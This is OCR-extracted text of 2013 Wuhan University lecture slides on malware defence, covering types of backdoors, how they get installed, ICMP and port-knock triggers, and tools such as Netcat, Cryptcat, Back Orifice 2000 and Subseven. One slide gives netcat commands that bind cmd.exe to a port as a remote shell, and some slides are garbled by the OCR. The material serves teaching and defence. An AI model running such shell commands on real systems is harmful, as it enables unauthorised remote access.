网络安全后后门教程.ppt

Wuhan University 恶意软件(病毒)的分析与防范 Defence analysis of malware 计算机学院傅建明 Fuims( 2013-422  Wuhan University 后门 后门是一个允许攻击者绕过系统中常规 安全控制机制的程序,他按照攻击者自 己的意图提供通道。 后门的重点在于为攻击者提供进入目标 计算机的通道。 2013-422  Wuhan University 后门的类型 本地权限的提升 对系统有访问权的攻击者变换其权限等级成为管理员,然后攻击者 可以重新设置该系统或访问人和存储在系统中的文件 单个命令的远程执行 攻击者可以向目标计算机发送消息。每次执行一个单独的命令,后 门执行攻击者的命令并将输出返回给攻击者 程命令行解释器访问 正如远程 Shell,这类后门允许攻击者通过网络快速直接地键入受害 计算机的命令提示。其比“单个命令的远程执行”要强大得多。 远程控制GUI 攻击者可以看到目标计算机的GUⅠ,控制鼠标的移动,输入对键盘的 操作,这些都通过网络实现 2013-422  Wuhan University 后门的安装 ·自己植入(物理接触或入侵之后) 通过病毒、蠕虫和恶意移动代码 欺骗受害者自己安装 Email 远程共亨 BT下载 2013-422  Wuhan University 后门举例 Netcat:通用的网络连接工具 用法一: nc-I-p 5000-e cmdexe nc5000 用法二: nc-1p5000 nc5000-ecmd,exe cshell. exe 2013-422  Wuhan University 其他 Windows下的后门程序 · Cryptcat 提供通向Tcp端口777,只有3K。 2013-422  会属*字 全点:全工月 rosoff Internet Explorer 文件吧端后①盔收缤①工)帮助 入中文,直升探M动到 Focus eam o the internet. For tie interner 五「焦烈全文病全I只安全「点点攻目论七「天于去们 南加工月 Icon English version 干台大小更歌时间 扫吾 击字 bysiell3ibeta2&re.Tar 5733205-移26 144 32.56 3 2105-05-lB teLl bellot rer php:gy_208,yu 唾相冥 E205-0304 其它工月 L.8k205-03-02xh vnquLsh-0, 2.0. zip ②E205022《 2013-422  Wuhan University 无端口后门-如何唤醒 ICMP后门 不使用 TCP/UDP协议 使用ICMP协议进行通信。 难以检测。 ·非混合型探测后门攻击者将触发指令发送到对方计算 机 难以检测。(COo: yn to port X, syn to port y, syn to port z) 混合型探测后门 只要攻击者将触发指令发送到对方网络中即可触发后门。 更加难以检测。( syn to port x, syn to port x, syn to port x in different Ips) 2013-422  Wuhan University Bits--glacier 进程管理器中看不到 平时没有端口,只是在系统中充当卧底 的角色 提供正向连接和反向连接两种功能 °仅适用于 Windows2000/XP/2003 具体用法和例子可以査看“难以觉察的后门 BITS”一文 2013-422  Wuhan University GUI( Graphics User Interface)远程控制 并非所有的GUI远程控制都是恶意的 VNC(Virtual Network Computin Windows Terminal services PCAnywhere Back Orifice 2000 Subseven 2013-422